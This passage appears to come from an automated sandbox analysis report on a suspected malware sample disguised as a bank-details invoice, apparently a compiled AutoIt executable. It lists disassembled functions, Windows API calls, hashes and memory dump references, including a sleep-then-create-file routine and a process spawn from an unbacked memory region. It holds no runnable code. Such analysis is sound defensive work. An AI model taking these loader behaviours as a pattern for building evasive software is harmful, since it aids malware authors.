                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 1053898822-1585850449
                    • Opcode ID: da965d1fd71c0a7956974fcd7076077584ce5ce1258d9a9357a7ed44f5d3d6f4
                    • Instruction ID: badedc31f6889291ab01af31bd8dead38d422d2eb2c6027e77ee2e83e21a7c1b
                    • Opcode Fuzzy Hash: da965d1fd71c0a7956974fcd7076077584ce5ce1258d9a9357a7ed44f5d3d6f4
                    • Instruction Fuzzy Hash: 2D31C171408B406FD320EB61EC46BDB77D8AB44314F00891FF58D9A192DBB8A548CB9E
                    APIs
                      • Part of subcall function 004741A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004739FE,?,00000001), ref: 004741DB
                    • _free.LIBCMT ref: 004E36B7
                    • _free.LIBCMT ref: 004E36FE
                      • Part of subcall function 0047C833: __wsplitpath.LIBCMT ref: 0047C93E
                      • Part of subcall function 0047C833: _wcscpy.LIBCMT ref: 0047C953
                      • Part of subcall function 0047C833: _wcscat.LIBCMT ref: 0047C968
                      • Part of subcall function 0047C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0047C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 805182592-1757145024
                    • Opcode ID: cd6a117ee93b172fe8ff869b9a94b73b3d8c7a46900e6cfef694d3a865fedeb3
                    • Instruction ID: 68cb2c86ea38f12b6cae73b16a21e0e1e0211e574e6cbf79c66564fffc5ddf79
                    • Opcode Fuzzy Hash: cd6a117ee93b172fe8ff869b9a94b73b3d8c7a46900e6cfef694d3a865fedeb3
                    • Instruction Fuzzy Hash: 02918171910259AFCF15EFA6CC859EEB7B4BF08315F00442FF416A7291DB38AA05CB68
                    APIs
                      • Part of subcall function 01341FE8: Sleep.KERNELBASE(000001F4), ref: 01341FF9
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01342240
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: QQM75G7XDPKLRE709AG
                    • API String ID: 2694422964-789174097
                    • Opcode ID: 578780f9178a9aecb5bfb97db61c67ed1bc86ab75b0c9773c332d940c03c0a81
                    • Instruction ID: 11be02b79d0dfd12b4fbd1ecd260e93a2a98d9f432501382b20c6383e1ebc49b
                    • Opcode Fuzzy Hash: 578780f9178a9aecb5bfb97db61c67ed1bc86ab75b0c9773c332d940c03c0a81
                    • Instruction Fuzzy Hash: F0619F70D14248DBEF11DBA4D854BEFBBB9AF18304F004199E608BB2C1D77A5B49CBA5
                    APIs
                    • _memset.LIBCMT ref: 004E3725
                    • GetOpenFileNameW.COMDLG32 ref: 004E376F
                      • Part of subcall function 0047660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004753B1,?,?,004761FF,?,00000000,00000001,00000000), ref: 0047662F
                      • Part of subcall function 004740A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004740C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X$t3R
                    • API String ID: 3777226403-3286752794
                    • Opcode ID: 7387efb0339e42cce88fd447ec7a6d1bc3faa22418ebffe7b9bf1bbdf80821f3
                    • Instruction ID: 207a9a5eb5118050d29b0e65f36cb5e7e8c371c2b4f95687c7c5ab7b0a1c105d
                    • Opcode Fuzzy Hash: 7387efb0339e42cce88fd447ec7a6d1bc3faa22418ebffe7b9bf1bbdf80821f3
                    • Instruction Fuzzy Hash: 3F21C971A101989FCF01DF95D8457EE7BF99F89304F00805AE408A7281DBB85689CF59
                    APIs
                    • __getstream.LIBCMT ref: 004934FE
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00493539
                    • __wopenfile.LIBCMT ref: 00493549
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                    • String ID: <G
                    • API String ID: 1820251861-2138716496
                    • Opcode ID: e4f40ac35d11377e6d390c9af55a0eb9bfd374ec3f682348050fcb2ab3494899
                    • Instruction ID: 037740784d9766ba4a09bde4624700851dc101cca4b4bfdd72dd7b7b348a1417
                    • Opcode Fuzzy Hash: e4f40ac35d11377e6d390c9af55a0eb9bfd374ec3f682348050fcb2ab3494899
                    • Instruction Fuzzy Hash: 94110D70900215AFDF11BF729C4266F3EA4AF46764B16853BE415C7281EB3CCE0197A9
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0048D28B,SwapMouseButtons,00000004,?), ref: 0048D2BC
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0048D28B,SwapMouseButtons,00000004,?,?,?,?,0048C865), ref: 0048D2DD
                    • RegCloseKey.KERNELBASE(00000000,?,?,0048D28B,SwapMouseButtons,00000004,?,?,?,?,0048C865), ref: 0048D2FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 6a74bebe94491a83f7a6affb00672fb9923ccf839c6ac15d5084a19dc25030e3
                    • Instruction ID: 1a699cc5acbc6330a63021e8148647587a6ec1e5e70a3bf24a4fde08716a0e2e
                    • Opcode Fuzzy Hash: 6a74bebe94491a83f7a6affb00672fb9923ccf839c6ac15d5084a19dc25030e3
                    • Instruction Fuzzy Hash: 70113C75A12208BFDB20AF64CC84EAF7BB8EF44754F10486AF805D7250D6359E41DB69
                    APIs
                      • Part of subcall function 00474517: _fseek.LIBCMT ref: 0047452F
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC65D
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC670
                    • _free.LIBCMT ref: 004BC4DD
                    • _free.LIBCMT ref: 004BC4E4
                    • _free.LIBCMT ref: 004BC54F
                      • Part of subcall function 00491C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00497A85), ref: 00491CB1
                      • Part of subcall function 00491C9D: GetLastError.KERNEL32(00000000,?,00497A85), ref: 00491CC3
                    • _free.LIBCMT ref: 004BC557
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                    • Instruction ID: c0e1fe5465827434153b298b39c13922f63295e7ac5e3a760452db9ff3c9e12f
                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                    • Instruction Fuzzy Hash: 5A516FB1904219AFDF249F65DC81BEDBBB9EF48304F1040AEB21DA3251DB755A808F69
                    APIs
                    • _memset.LIBCMT ref: 0048EBB2
                      • Part of subcall function 004751AF: _memset.LIBCMT ref: 0047522F
                      • Part of subcall function 004751AF: _wcscpy.LIBCMT ref: 00475283
                      • Part of subcall function 004751AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00475293
                    • KillTimer.USER32(?,00000001,?,?), ref: 0048EC07
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0048EC16
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004E3C88
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: fefd59608fb89d167a5f865937ada47da9e67b2449083e15cb75982931fd6b1e
                    • Instruction ID: 0efd38d9f807c16dc1b98e3f32a63201cfb1080fb74c0286240d782b30e9167f
                    • Opcode Fuzzy Hash: fefd59608fb89d167a5f865937ada47da9e67b2449083e15cb75982931fd6b1e
                    • Instruction Fuzzy Hash: 6E21DA719047849FE7339B398859BEBBBEC9F01309F14045EE68E57241C3786A85CB5A
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01340D6D
                    • ExitProcess.KERNEL32(00000000), ref: 01340D8C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$CreateExit
                    • String ID: D
                    • API String ID: 126409537-2746444292
                    • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                    • Instruction ID: 22aa0c3149c86d3c66eb04f496ddd128631d871830ede8f03a1b100ab4e603c0
                    • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                    • Instruction Fuzzy Hash: 3AF0FF7254024CABDB64EFE4CC49FEE77BCBF04705F408508FB5A9A180DA74A6088B61
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004BC72F
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004BC746
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: f5cf406750d43d096f995ed72f72e31d24a03a112a45109f8efc4c07f770f57b
                    • Instruction ID: b13ec9b781ee2d633c2e6197b56fe3c2c293f39dd9675ffbda152d5a7ea4439f
                    • Opcode Fuzzy Hash: f5cf406750d43d096f995ed72f72e31d24a03a112a45109f8efc4c07f770f57b
                    • Instruction Fuzzy Hash: 6FD05E7190030EABDB10AB90EC0EF9A7B6CAB00704F0001A07690E50F1DAB5E6A9CB99
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c6df8f4bee8a81936ad6308a069195bbd70f8fa0044cc8973fb5c459a487c5
                    • Instruction ID: 0478d551f2fbe18a94f76c601c32ba7cb382c3e544ada785583b931e61519bdb
                    • Opcode Fuzzy Hash: 14c6df8f4bee8a81936ad6308a069195bbd70f8fa0044cc8973fb5c459a487c5
                    • Instruction Fuzzy Hash: 7EF158756043019FC710DF25C481B6AB7E5FF88318F10892EF99A9B392D778E909CB86
                    APIs
                    • _memset.LIBCMT ref: 00475022
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004750CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconNotifyShell__memset
                    • String ID:
                    • API String ID: 928536360-0
                    • Opcode ID: 3af740ca5768d2f8a6f599c3980deec6c5d6f2570e87fa6358388903f04c35bf
                    • Instruction ID: 73678f12bac10465f9fcec6f0881f336dc2467bdbbcf5a8a20fa561aa7bfab9f
                    • Opcode Fuzzy Hash: 3af740ca5768d2f8a6f599c3980deec6c5d6f2570e87fa6358388903f04c35bf
                    • Instruction Fuzzy Hash: B1317AB0504B408FD721DF25D8456DBBBE4EB58309F00492EE59E86340E7B5A948CB9A
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00493973
                      • Part of subcall function 004981C2: __NMSG_WRITE.LIBCMT ref: 004981E9
                      • Part of subcall function 004981C2: __NMSG_WRITE.LIBCMT ref: 004981F3
                    • __NMSG_WRITE.LIBCMT ref: 0049397A
                      • Part of subcall function 0049821F: GetModuleFileNameW.KERNEL32(00000000,00530312,00000104,00000000,00000001,00000000), ref: 004982B1
                      • Part of subcall function 0049821F: ___crtMessageBoxW.LIBCMT ref: 0049835F
                      • Part of subcall function 00491145: ___crtCorExitProcess.LIBCMT ref: 0049114B
                      • Part of subcall function 00491145: ExitProcess.KERNEL32 ref: 00491154
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000001,00000000,?,?,0048F507,?,0000000E), ref: 0049399F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 9c53bae8eb8a3ed1cd21f43a073767a483805fad81c34991247f2b02b9a17abc
                    • Instruction ID: f4be4d83cd270d4f30361f5ebb0651628e9f14cf0650969aee1c7619f7ca907f
                    • Opcode Fuzzy Hash: 9c53bae8eb8a3ed1cd21f43a073767a483805fad81c34991247f2b02b9a17abc
                    • Instruction Fuzzy Hash: 670196B22453019AEE213F66DC56B2B2B489B83B69B21003FF505973D1DBBCDD01866D
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004BC385,?,?,?,?,?,00000004), ref: 004BC6F2
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004BC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004BC708
                    • CloseHandle.KERNEL32(00000000,?,004BC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004BC70F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 61a2d7482c568c433baf7f23f34e74242922a687afa1195b605ec0a5d1315c19
                    • Instruction ID: c0aa398b5482bfc2dbdda50ce0a517e75dde58cc463131d737260d9bcee4012e
                    • Opcode Fuzzy Hash: 61a2d7482c568c433baf7f23f34e74242922a687afa1195b605ec0a5d1315c19
                    • Instruction Fuzzy Hash: 41E08632540214B7D7211B54AC4DFDE7B19AB05764F104120FB14690E097B12531C79C
                    APIs
                    • _free.LIBCMT ref: 004BBB72
                      • Part of subcall function 00491C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00497A85), ref: 00491CB1
                      • Part of subcall function 00491C9D: GetLastError.KERNEL32(00000000,?,00497A85), ref: 00491CC3
                    • _free.LIBCMT ref: 004BBB83
                    • _free.LIBCMT ref: 004BBB95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                    • Instruction ID: 81794d8c19092dcb03ae5eee3b458eeb713f78711d03ad2ce8064dd0831bf2ae
                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                    • Instruction Fuzzy Hash: 16E012A164574246DE24697A6E44EF717CC8F04355714082FB459E7646CF6CF84085FC
                    APIs
                      • Part of subcall function 004722A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004724F1), ref: 00472303
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004725A1
                    • CoInitialize.OLE32(00000000), ref: 00472618
                    • CloseHandle.KERNEL32(00000000), ref: 004E503A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                    • String ID:
                    • API String ID: 3815369404-0
                    • Opcode ID: 3157057a1c5d21fc813eab62b2a4ec5abea133501bd1de987b16da107b348455
                    • Instruction ID: c97f90c914816398bce9273579d3458820b76612c594a6815df823708a010a51
                    • Opcode Fuzzy Hash: 3157057a1c5d21fc813eab62b2a4ec5abea133501bd1de987b16da107b348455
                    • Instruction Fuzzy Hash: FD71B0B8901A818BC704EF7BE99049ABBE4FB79344780852EE509C7771CB744418EF2C
                    APIs
                    • _strcat.LIBCMT ref: 004D08FD
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • _wcscpy.LIBCMT ref: 004D098C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __itow__swprintf_strcat_wcscpy
                    • String ID:
                    • API String ID: 1012013722-0
                    • Opcode ID: 51272c1e060d210c7b232895f8facea4b516b276d31a9e311de05d5e008a9b1f
                    • Instruction ID: a6205440b4ed2c7d9162f7088cee7425698fbca334bf2ed52e805104bf187c84
                    • Opcode Fuzzy Hash: 51272c1e060d210c7b232895f8facea4b516b276d31a9e311de05d5e008a9b1f
                    • Instruction Fuzzy Hash: 51913C34A00605DFCB18DF19C591AA9B7E5FF59314B55806FE81A8F352DB38ED01CB89
                    APIs
                    • IsThemeActive.UXTHEME ref: 00473A73
                      • Part of subcall function 00491405: __lock.LIBCMT ref: 0049140B
                      • Part of subcall function 00473ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00473AF3
                      • Part of subcall function 00473ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00473B08
                      • Part of subcall function 00473D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00473AA3,?), ref: 00473D45
                      • Part of subcall function 00473D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00473AA3,?), ref: 00473D57
                      • Part of subcall function 00473D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00531148,00531130,?,?,?,?,00473AA3,?), ref: 00473DC8
                      • Part of subcall function 00473D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00473AA3,?), ref: 00473E48
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00473AB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 924797094-0
                    • Opcode ID: d69f7dffbeec2ea1bc1a9a70379b507f69d776f9caf7cb388345da2f56ba50f1
                    • Instruction ID: fdf5c6aa5999a192926b8283ae90c452df488c5d19dde86a6167becc1985b101
                    • Opcode Fuzzy Hash: d69f7dffbeec2ea1bc1a9a70379b507f69d776f9caf7cb388345da2f56ba50f1
                    • Instruction Fuzzy Hash: A811AE719043419BC304EF2AED4595EBBE9EBA4310F00891FF484872B1DBB49559DB9A
                    APIs
                    • ___lock_fhandle.LIBCMT ref: 0049EA29
                    • __close_nolock.LIBCMT ref: 0049EA42
                      • Part of subcall function 00497BDA: __getptd_noexit.LIBCMT ref: 00497BDA
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
